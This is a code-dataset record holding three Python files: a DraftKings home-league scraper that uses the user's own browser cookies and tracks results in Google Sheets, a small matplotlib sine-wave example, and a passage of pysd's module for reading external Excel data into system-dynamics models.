17ab695df9ceccf5b7f135181b19ade8d47add5f
|
[
"Apache-2.0"
] | null | null | null |
dkhomeleague/dkhomeleague.py
|
sansbacon/dkhomeleague
|
17ab695df9ceccf5b7f135181b19ade8d47add5f
|
[
"Apache-2.0"
] | null | null | null |
dkhomeleague/dkhomeleague.py
|
sansbacon/dkhomeleague
|
17ab695df9ceccf5b7f135181b19ade8d47add5f
|
[
"Apache-2.0"
] | null | null | null |
# dkhomeleague.py
import json
import logging
import os
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
return r.content()
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
# TODO: this may same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
Sheet is set up with week as Column A, League Users as Column B -
Each row is a weekly result starting with the week number
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
ws = pdsheet.get_worksheet(self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
headers = rng.get_values()[0]
self._colmap = {user:idx for idx, user in enumerate(headers)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
# get the sheet
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
# figure out the last row
rng = s.get_data_range()
newrow_index = rng.coordinates.number_of_row + 1
# now loop through the results and add to sheet
colmap = self.column_map
for k,v in results.items():
colnum = colmap.get(k)
if colnum:
cell = s.get_range(newrow_index, colnum, 1, 1)
cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
| 33.250746
| 133
| 0.586767
| 1,301
| 11,139
| 4.883167
| 0.216756
| 0.026916
| 0.018417
| 0.014324
| 0.33858
| 0.320006
| 0.299701
| 0.277979
| 0.260507
| 0.252322
| 0
| 0.007787
| 0.296705
| 11,139
| 334
| 134
| 33.350299
| 0.803166
| 0.212946
| 0
| 0.213018
| 0
| 0.005917
| 0.191497
| 0.04586
| 0
| 0
| 0
| 0.002994
| 0
| 1
| 0.16568
| false
| 0.023669
| 0.047337
| 0.017751
| 0.372781
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b401f8d464942d7d88868c9047da1188916d43
| 246
|
py
|
Python
|
Graphing/Example1.py
|
Wadden12/Semester1
|
a13c4486848daec3b5865e8a2a778689c81528fe
|
[
"Apache-2.0"
] | null | null | null |
Graphing/Example1.py
|
Wadden12/Semester1
|
a13c4486848daec3b5865e8a2a778689c81528fe
|
[
"Apache-2.0"
] | null | null | null |
Graphing/Example1.py
|
Wadden12/Semester1
|
a13c4486848daec3b5865e8a2a778689c81528fe
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
import numpy as np
import matplotlib.pyplot as plt
t = np.arange(0.0, 3.0, 0.01)
s = np.sin(2.5 * np.pi * t)
plt.plot(t, s)
plt.xlabel('time (s)')
plt.ylabel('voltage (mV)')
plt.title('Sine Wave')
plt.grid(True)
plt.show()
| 15.375
| 31
| 0.646341
| 50
| 246
| 3.18
| 0.64
| 0.025157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.047393
| 0.142276
| 246
| 16
| 32
| 15.375
| 0.706161
| 0.069106
| 0
| 0
| 0
| 0
| 0.126638
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60bc8d5255a0bd875f4af98e1eec0327e1d5bb7e
| 34,771
|
py
|
Python
|
pysd/py_backend/external.py
|
rogersamso/pysd_dev
|
85606265aa92878c35a41dd81ce9588d23350e19
|
[
"MIT"
] | null | null | null |
pysd/py_backend/external.py
|
rogersamso/pysd_dev
|
85606265aa92878c35a41dd81ce9588d23350e19
|
[
"MIT"
] | 1
|
2021-05-25T16:34:10.000Z
|
2021-05-25T16:34:10.000Z
|
pysd/py_backend/external.py
|
rogersamso/pysd_dev
|
85606265aa92878c35a41dd81ce9588d23350e19
|
[
"MIT"
] | null | null | null |
"""
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
Function thar reads series and data from excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\tDimentime_missingsion name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
# the lentgh of 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell like string, such as "A1", "b16", "AC19"...
If it is not a cell like string will return None.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
@staticmethod
def _reshape(data, dims):
"""
Reshapes an pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
Selects if a series data (DATA/LOOKUPS), should be read by columns,
rows or cellrange name.
Based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if series is given in a row, letter if series is
given in a column or name if the series is given by cellrange name.
cell: str
Cell identificator, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
# if the cell can be splitted means that the format is
# "A1" like then the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
if data_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Constant value missing or non-valid in:\n"
+ self._file_sheet
